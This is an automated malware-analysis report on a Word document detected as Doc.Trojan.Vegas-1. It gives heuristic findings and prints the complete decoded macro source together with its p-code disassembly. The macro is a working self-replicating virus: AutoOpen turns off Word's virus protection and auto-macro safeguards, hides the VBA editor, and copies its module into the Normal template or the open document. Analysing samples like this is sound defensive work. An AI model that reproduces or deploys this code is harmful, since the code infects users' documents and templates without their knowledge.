Malware Insights
The sample is a Microsoft Word document with a high-confidence detection for VBA macros, including an AutoOpen macro and a CreateObject call. The presence of legacy WordBasic auto-exec markers and a NOP-equivalent sled further indicates malicious intent. While the VBA code is truncated, it declares Windows API functions such as FatalAppExit and ExitWindows, suggesting an attempt to manipulate the system or terminate processes. The ClamAV detection 'Doc.Trojan.Vegas-1' strongly suggests a known malware family, though specific details are not available in the provided evidence.
Heuristics (7)
- ClamAV: Doc.Trojan.Vegas-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Vegas-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
  - CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
    Dim fs, d, s
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set d = fs.GetDrive(fs.GetDriveName(drvpath))
  - AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
    Sub AutoOpen()
    Application.EnableCancelKey = wdCancelDisabled
  - Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched lines in script:
    Application.VBE.MainWindow.Visible = False
    pth = Environ("temp") & "\~WRr000^.tmp"
    Set dc = NormalTemplate.VBProject.VBComponents
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x61 bytes. Note that 0x61 is also the ASCII character 'a', so in a document file a run of this byte can be repeated text or padding rather than code; the x86 decoding below is an attempt, not proof of shellcode.
  Disassembly: attempted x86 opcode disassembly of the flagged region (every byte decodes as 61 popal).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | Detection |
|---|---|---|---|---|
| macros.bas (SHA-256: 176f77270f9f69b4d44cf7faef67ed3b0633ddec1f62f74bd2a588133b1d53f9) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14015 bytes | ClamAV: Doc.Trojan.Vegas-1; obfuscation or payload: unlikely |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub test()
MsgBox ("Test")
End Sub
Attribute VB_Name = "vegas"
Sub test2()
MsgBox ("Test2")
End Sub
Attribute VB_Name = "Vegas1"
Option Explicit
Const NStat = 1
Const VStat = 1
Public Declare Sub FatalAppExit Lib "kernel32" Alias "FatalAppExitA" (ByVal uAction As Long, ByVal lpMessageText As String)
Public Declare Function ExitWindows Lib "user32" (ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Sub ShowFreeSpace(drvpath)
Dim fs, d, s
Set fs = CreateObject("Scripting.FileSystemObject")
Set d = fs.GetDrive(fs.GetDriveName(drvpath))
s = "Drive " & UCase(drvpath) & " - "
s = s & d.VolumeName & vbCrLf
s = s & "Free Space: " & FormatNumber(d.FreeSpace / 1024, 0)
s = s & " Kbytes"
MsgBox s
End Sub
Sub ShowFolderList()
Dim fs, f, f1, fc, s, i, folderspec
folderspec = "D:\"
Set fs = CreateObject("Scripting.FileSystemObject")
Set f = fs.GetFolder(folderspec)
Set fc = f.subfolders
For i = 1 To fc.Count
s = s & fc.Item(1)
s = s & vbCrLf
Next i
MsgBox s
End Sub
Sub ShowFileList()
Dim fs, f, f1, fc, s, folderspec
Set fs = CreateObject("Scripting.FileSystemObject")
folderspec = "D:\"
Set f = fs.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
s = s & f1.Name
s = s & vbCrLf
Next
MsgBox s
End Sub
Sub ShowDriveType()
Dim fs, d, dd, dc, n, s, t
Dim fe, drvpath
drvpath = "d:\"
Set fs = CreateObject("Scripting.FileSystemObject")
'Set d = fs.GetDrive(drvpath)
Set dc = fs.Drives
For Each d In dc
s = s & d.DriveLetter & " - "
Select Case d.DriveType
Case 0: t = "Unknown"
Case 1: t = "Removable"
Case 2: t = "Fixed"
Case 3: t = "Network"
Case 4: t = "CD-ROM"
Case 5: t = "RAM Disk"
End Select
If d.DriveType = 1 Then
n = d.ShareName
Else
n = d.VolumeName
End If
s = s & "Drive " & d.DriveLetter & ": - " & t & " - " & n & vbCrLf
Next
MsgBox s
End Sub
Sub qw()
Call ShowDriveType("d:\")
End Sub
Sub ShowFileSize()
Dim fs, f, s, filespec
Set fs = CreateObject("Scripting.FileSystemObject")
filespec = "d:\pass.exe"
Set f = fs.GetFile(filespec)
s = UCase(f.Name) & " is a " & f.Type
MsgBox s, 0, "File Size Info"
End Sub
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Dim pth As String, i As Byte, dc As Object
Dim NInst As Boolean, AInst As Boolean
On Error Resume Next
Application.VBE.MainWindow.Visible = False
pth = Environ("temp") & "\~WRr000^.tmp"
Set dc = NormalTemplate.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "Vegas" Then
NInst = 1
dc(i).Export pth
End If
Next i
Set dc = ActiveDocument.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "Vegas" Then
AInst = 1
dc(i).Export pth
End If
Next i
If AInst = True And NInst = False Then Set dc = NormalTemplate
If AInst = False And NInst = True Then Set dc = ActiveDocument
If AInst = False Or NInst = False Then
dc.VBProject.VBComponents.Import pth
ActiveDocument.Save
If Mid(ActiveDocument.FullName, 2, 1) = ":" Then dc.Save
Kill pth
End If
End Sub
Sub AutoExec()
End Sub
Sub Fileprint()
Dialogs(wdDialogFilePrint).Show
End Sub
Sub FileSave()
ActiveDocument.Save
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
End Sub
' Processing file: /tmp/qstore_u1b_ice3
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1443 bytes
' Line #0:
' FuncDefn (Sub test())
' Line #1:
' LitStr 0x0004 "Test"
' Paren
' ArgsCall MsgBox 0x0001
' Line #2:
' EndSub
' Macros/VBA/vegas - 918 bytes
' Line #0:
' FuncDefn (Sub test2())
' Line #1:
' LitStr 0x0005 "Test2"
' Paren
' ArgsCall MsgBox 0x0001
' Line #2:
' EndSub
' Line #3:
' Macros/VBA/Vegas1 - 8618 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' Dim (Const)
' LitDI2 0x0001
' VarDefn NStat
' Line #2:
' Dim (Const)
' LitDI2 0x0001
' VarDefn VStat
' Line #3:
' FuncDefn (Public Declare Sub FatalAppExit Lib "kernel32" (ByVal uAction As Long, ByVal lpMessageText As String))
' Line #4:
' FuncDefn (Public Declare Function ExitWindows Lib "user32" (ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long)
' Line #5:
' FuncDefn (Declare Function GetSystemDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #6:
' Line #7:
' FuncDefn (Sub ShowFreeSpace(drvpath))
' Line #8:
' Dim
' VarDefn fs
' VarDefn d
' VarDefn s
' Line #9:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #10:
' SetStmt
' Ld drvpath
' Ld fs
' ArgsMemLd GetDriveName 0x0001
' Ld fs
' ArgsMemLd GetDrive 0x0001
' Set d
' Line #11:
' LitStr 0x0006 "Drive "
' Ld drvpath
' ArgsLd UCase 0x0001
' Concat
' LitStr 0x0003 " - "
' Concat
' St s
' Line #12:
' Ld s
' Ld d
' MemLd VolumeName
' Concat
' Ld vbCrLf
' Concat
' St s
' Line #13:
' Ld s
' LitStr 0x000C "Free Space: "
' Concat
' Ld d
' MemLd FreeSpace
' LitDI2 0x0400
' Div
' LitDI2 0x0000
' ArgsLd FormatNumber 0x0002
' Concat
' St s
' Line #14:
' Ld s
' LitStr 0x0007 " Kbytes"
' Concat
' St s
' Line #15:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #16:
' EndSub
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' FuncDefn (Sub ShowFolderList())
' Line #22:
' Dim
' VarDefn fs
' VarDefn False
' VarDefn f1
' VarDefn fc
' VarDefn s
' VarDefn i
' VarDefn folderspec
' Line #23:
' LitStr 0x0003 "D:\"
' St folderspec
' Line #24:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #25:
' SetStmt
' Ld folderspec
' Ld fs
' ArgsMemLd GetFolder 0x0001
' Set False
' Line #26:
' SetStmt
' Ld False
' MemLd subfolders
' Set fc
' Line #27:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld fc
' MemLd Count
' For
' Line #28:
' Ld s
' LitDI2 0x0001
' Ld fc
' ArgsMemLd Item 0x0001
' Concat
' St s
' Line #29:
' Ld s
' Ld vbCrLf
' Concat
' St s
' Line #30:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #31:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #32:
' EndSub
' Line #33:
' Line #34:
' FuncDefn (Sub ShowFileList())
' Line #35:
' Dim
' VarDefn fs
' VarDefn False
' VarDefn f1
' VarDefn fc
' VarDefn s
' VarDefn folderspec
' Line #36:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #37:
' LitStr 0x0003 "D:\"
' St folderspec
' Line #38:
' SetStmt
' Ld folderspec
' Ld fs
' ArgsMemLd GetFolder 0x0001
' Set False
' Line #39:
' SetStmt
' Ld False
' MemLd Files
' Set fc
' Line #40:
' StartForVariable
' Ld f1
' EndForVariable
' Ld fc
' ForEach
' Line #41:
' Ld s
' Ld f1
' MemLd New
' Concat
' St s
' Line #42:
' Ld s
' Ld vbCrLf
' Concat
' St s
' Line #43:
' StartForVariable
' Next
' Line #44:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #45:
' EndSub
' Line #46:
' Line #47:
' Line #48:
' FuncDefn (Sub ShowDriveType())
' Line #49:
' Dim
' VarDefn fs
' VarDefn d
' VarDefn dd
' VarDefn dc
' VarDefn n
' VarDefn s
' VarDefn t
' Line #50:
' Dim
' VarDefn fe
' VarDefn drvpath
' Line #51:
' LitStr 0x0003 "d:\"
' St drvpath
' Line #52:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #53:
' QuoteRem 0x0004 0x001C "Set d = fs.GetDrive(drvpath)"
' Line #54:
' SetStmt
' Ld fs
' MemLd Drives
' Set dc
' Line #55:
' StartForVariable
' Ld d
' EndForVariable
' Ld dc
' ForEach
' Line #56:
' Ld s
' Ld d
' MemLd DriveLetter
' Concat
' LitStr 0x0003 " - "
' Concat
' St s
' Line #57:
' Ld d
' MemLd DriveType
' SelectCase
' Line #58:
' LitDI2 0x0000
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0007 "Unknown"
' St t
' Line #59:
' LitDI2 0x0001
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0009 "Removable"
' St t
' Line #60:
' LitDI2 0x0002
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0005 "Fixed"
' St t
' Line #61:
' LitDI2 0x0003
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0007 "Network"
' St t
' Line #62:
' LitDI2 0x0004
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0006 "CD-ROM"
' St t
' Line #63:
' LitDI2 0x0005
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0008 "RAM Disk"
' St t
' Line #64:
' EndSelect
' Line #65:
' Ld d
' MemLd DriveType
' LitDI2 0x0001
' Eq
' IfBlock
' Line #66:
' Ld d
' MemLd ShareName
' St n
' Line #67:
' ElseBlock
' Line #68:
' Ld d
' MemLd VolumeName
' St n
' Line #69:
' EndIfBlock
' Line #70:
' Ld s
' LitStr 0x0006 "Drive "
' Concat
' Ld d
' MemLd DriveLetter
' Concat
' LitStr 0x0004 ": - "
' Concat
' Ld t
' Concat
' LitStr 0x0003 " - "
' Concat
' Ld n
' Concat
' Ld vbCrLf
' Concat
' St s
' Line #71:
' StartForVariable
' Next
' Line #72:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #73:
' EndSub
' Line #74:
' Line #75:
' FuncDefn (Sub qw())
' Line #76:
' LitStr 0x0003 "d:\"
' ArgsCall (Call) ShowDriveType 0x0001
' Line #77:
' EndSub
' Line #78:
' Line #79:
' FuncDefn (Sub ShowFileSize())
' Line #80:
' Dim
' VarDefn fs
' VarDefn False
' VarDefn s
' VarDefn filespec
' Line #81:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #82:
' LitStr 0x000B "d:\pass.exe"
' St filespec
' Line #83:
' SetStmt
' Ld filespec
' Ld fs
' ArgsMemLd GetFile 0x0001
' Set False
' Line #84:
' Ld False
' MemLd New
' ArgsLd UCase 0x0001
' LitStr 0x0006 " is a "
' Concat
' Ld False
' MemLd TypeOf
' Concat
' St s
' Line #85:
' Ld s
' LitDI2 0x0000
' LitStr 0x000E "File Size Info"
' ArgsCall MsgBox 0x0003
' Line #86:
' EndSub
' Line #87:
' Line #88:
' Line #89:
' FuncDefn (Sub AutoOpen())
' Line #90:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #91:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #92:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #93:
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #94:
' Dim
' VarDefn pth (As String)
' VarDefn i (As Byte)
' VarDefn dc (As Object)
' Line #95:
' Dim
' VarDefn NInst (As Boolean)
' VarDefn AInst (As Boolean)
' Line #96:
' OnError (Resume Next)
' Line #97:
' LitVarSpecial (False)
' Ld Application
' MemLd VBE
' MemLd MainWindow
' MemSt Visible
' Line #98:
' LitStr 0x0004 "temp"
' ArgsLd Environ 0x0001
' LitStr 0x000D "\~WRr000^.tmp"
' Concat
' St pth
' Line #99:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set dc
' Line #100:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld dc
' MemLd Count
' For
' Line #101:
' Ld i
' ArgsLd dc 0x0001
' MemLd New
' LitStr 0x0005 "Vegas"
' Eq
' IfBlock
' Line #102:
' LitDI2 0x0001
' St NInst
' Line #103:
' Ld pth
' Ld i
' ArgsLd dc 0x0001
' ArgsMemCall Export 0x0001
' Line #104:
' EndIfBlock
' Line #105:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #106:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set dc
' Line #107:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld dc
' MemLd Count
' For
' Line #108:
' Ld i
' ArgsLd dc 0x0001
' MemLd New
' LitStr 0x0005 "Vegas"
' Eq
' IfBlock
' Line #109:
' LitDI2 0x0001
' St AInst
' Line #110:
' Ld pth
' Ld i
' ArgsLd dc 0x0001
' ArgsMemCall Export 0x0001
' Line #111:
' EndIfBlock
' Line #112:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #113:
' Ld AInst
' LitVarSpecial (True)
' Eq
' Ld NInst
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld NormalTemplate
' Set dc
' EndIf
' Line #114:
' Ld AInst
' LitVarSpecial (False)
' Eq
' Ld NInst
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld ActiveDocument
' Set dc
' EndIf
' Line #115:
' Ld AInst
' LitVarSpecial (False)
' Eq
' Ld NInst
' LitVarSpecial (False)
' Eq
' Or
' IfBlock
' Line #116:
' Ld pth
' Ld dc
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #117:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #118:
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 ":"
' Eq
' If
' BoSImplicit
' Ld dc
' ArgsMemCall Save 0x0000
' EndIf
' Line #119:
' Ld pth
' ArgsCall Kill 0x0001
' Line #120:
' EndIfBlock
' Line #121:
' EndSub
' Line #122:
' Line #123:
' FuncDefn (Sub AutoExec())
' Line #124:
' EndSub
' Line #125:
' Line #126:
' FuncDefn (Sub Fileprint())
' Line #127:
' Ld wdDialogFilePrint
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #128:
' EndSub
' Line #129:
' FuncDefn (Sub FileSave())
' Line #130:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #131:
' EndSub
' Line #132:
' FuncDefn (Sub FileSaveAs())
' Line #133:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #134:
' EndSub
' Line #135: